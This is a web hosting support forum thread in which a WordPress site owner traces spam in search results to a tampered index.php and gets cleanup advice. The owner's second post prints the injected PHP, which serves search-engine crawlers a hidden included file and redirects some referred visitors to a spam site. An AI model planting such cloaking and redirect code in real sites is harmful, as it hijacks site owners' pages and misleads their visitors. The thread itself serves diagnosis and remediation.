Incorrect results showing on Google and Bing search results?

Webuser2014

Member
Jan 10, 2014
9
0
1
cPanel Access Level
Website Owner
Has anyone looked at their website search results lately? I have and it is advertising spam stuff. We have nothing to do with spam stuff. There is nothing in our files on the webserver that says spam stuff but somehow it is showing in the results. Any ideas?
 
Last edited by a moderator:

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,913
2,202
363
Hello :)

I suggest reviewing the .htaccess files and the code used in your scripts to determine if there is any data associated with those search engine results. It's possible your website files were exploited or the account itself was exploited.

Thank you.
 

Webuser2014

Member
Jan 10, 2014
9
0
1
cPanel Access Level
Website Owner
Thank for the info.

The index.php was modified somehow.

It was modified to
Code:
<?php
ini_set("display_errors","0");
define('WP_USE_THEMES', true);

$flag=false;$tmp=$_SERVER['HTTP_USER_AGENT'];if(stripos($tmp,'Google')!==false){$flag=true;}else if(stripos($tmp,'Bing')!==false){$flag=true;}else if(stripos($tmp,'Yahoo')!==false){$flag=true;}else if(stripos($tmp,'msnbot')!==false){$flag=true;}else if($_GET["c"]!=""){$flag=true;}
if($flag == false){

$RUrl=rawurldecode($_SERVER ['HTTP_REFERER']);

if (stripos($RUrl, 'spam crap here') or stripos($_GET["p"],'spam') !== false){header ( "Location: http://www.spamsitenamehere.com/" );}else{require('./wp-blog-header.php');}
} else {
include_once('bar.gif');
}
I have restored it to the original so my wordpress site now works.

Code:
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
 

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
Did you note the time stamps on the index file before you reverted it? You'll need this information to properly fix the infection, otherwise it will likely return.

Check for any other files modified around that time; make sure your wordpress is updated, and audit your theme(s) and plugins for similar code. Always change your wp-admin password and your cPanel password as well.